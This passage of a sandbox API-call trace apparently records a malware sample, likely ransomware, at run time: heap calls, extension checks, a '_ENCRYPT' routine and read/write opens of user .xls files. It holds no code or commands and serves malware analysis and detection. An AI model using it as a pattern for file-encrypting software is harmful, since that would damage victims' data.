dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.408] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.410] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.410] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0031.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.411] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.411] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.412] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.412] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.412] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.412] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.412] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.412] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.413] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.413] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x7f7, lpOverlapped=0x0) returned 1 [0031.413] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x7f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.413] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.413] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.413] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.413] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.413] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.413] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.414] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.414] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.414] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.414] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca18 [0031.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.414] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\r99f_hog0ivxg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.415] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.415] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.415] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.415] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.415] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0031.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.415] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.415] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.416] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.416] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.416] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.416] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.416] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.416] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c5448 [0031.416] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 